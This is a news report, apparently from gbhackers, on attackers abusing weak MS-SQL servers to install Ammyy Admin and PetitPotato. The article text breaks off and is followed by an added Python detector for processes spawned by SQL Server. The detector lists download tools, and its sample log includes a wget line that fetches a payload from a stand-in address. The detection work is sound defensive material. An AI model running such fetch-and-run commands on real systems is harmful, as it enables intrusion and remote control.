
Hackers Exploit MS-SQL Servers to Deploy Ammyy Admin for Remote Access


A sophisticated cyberattack campaign has surfaced, targeting poorly managed Microsoft SQL (MS-SQL) servers to deploy tools such as Ammyy Admin and the PetitPotato malware.

Cybersecurity researchers have observed attackers exploiting vulnerabilities in these servers to gain unauthorized access, execute commands for reconnaissance, and install malware that facilitates remote access and privilege escalation.

This emerging threat underscores the critical need for robust security measures to protect database environments, which are often a gateway to sensitive organizational data.

New Threat Campaign Targets Vulnerable Database Servers

The attack begins with adversaries identifying and exploiting misconfigured or unpatched MS-SQL servers, leveraging weak credentials or known vulnerabilities to infiltrate systems.

Once inside, they execute commands to gather detailed system information, mapping out the environment for further exploitation.

The attackers then use tools like WGet to download and install malware payloads, including Ammyy Admin, a legitimate remote desktop software frequently abused for malicious purposes, and PetitPotato, a ...
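A defender-side illustration of the chain described above, added here and not taken from the article or its source: it walks process-creation records in time order and flags every process descended from the SQL Server engine. The process-name lists, the `ammyy` file-name match and the sample records (Sysmon Event ID 1 field names) are assumptions constructed for the example.

```python
import ntpath

# Assumptions (not from the article): sqlservr.exe is the SQL Server engine
# process; the name lists are illustrative, not published indicators.
SQL_ENGINE = "sqlservr.exe"
CATEGORIES = {
    "shell": {"cmd.exe", "powershell.exe"},
    "recon": {"whoami.exe", "systeminfo.exe", "ipconfig.exe", "net.exe"},
    "download": {"wget.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"},
}

def _name(path):
    return ntpath.basename(path or "").lower()

def find_sql_descendants(events):
    """Return (pid, category, command line) for each process whose ancestry
    includes the SQL Server engine. Events must be in time order."""
    tainted = set()  # PIDs already known to descend from sqlservr.exe
    alerts = []
    for ev in events:
        child = _name(ev["Image"])
        from_sql = _name(ev["ParentImage"]) == SQL_ENGINE
        if not from_sql and ev["ParentProcessId"] not in tainted:
            continue
        tainted.add(ev["ProcessId"])
        category = next((c for c, names in CATEGORIES.items() if child in names), "other")
        # Assumption: the tool keeps "ammyy" in its file name; a renamed copy
        # would need a hash or signature check instead.
        if "ammyy" in child:
            category = "remote-access-tool"
        alerts.append((ev["ProcessId"], category, ev["CommandLine"]))
    return alerts

# Constructed sample records, oldest first (paths and address are made up).
_SQL = r"C:\SQL\Binn\sqlservr.exe"
_CMD = r"C:\Windows\System32\cmd.exe"
_FIELDS = ("ProcessId", "ParentProcessId", "Image", "ParentImage", "CommandLine")
SAMPLE = [dict(zip(_FIELDS, row)) for row in [
    (4100, 1880, _CMD, _SQL, "cmd.exe /c whoami"),
    (4104, 4100, r"C:\Windows\System32\whoami.exe", _CMD, "whoami"),
    (5000, 900, r"C:\Windows\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    (4200, 1880, _CMD, _SQL, "cmd.exe /c wget.exe http://203.0.113.10/a.exe"),
    (4204, 4200, r"C:\Temp\wget.exe", _CMD, "wget.exe http://203.0.113.10/a.exe"),
    (4300, 1880, _CMD, _SQL, r"cmd.exe /c C:\Temp\ammyy.exe"),
    (4304, 4300, r"C:\Temp\ammyy.exe", _CMD, r"C:\Temp\ammyy.exe"),
]]

if __name__ == "__main__":
    for alert in find_sql_descendants(SAMPLE):
        print(alert)
```

Following the parent PID rather than only the parent image name is what catches `whoami.exe` and `wget.exe` here, since their direct parent is `cmd.exe`, not the database engine.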


Copyright of this story solely belongs to gbhackers.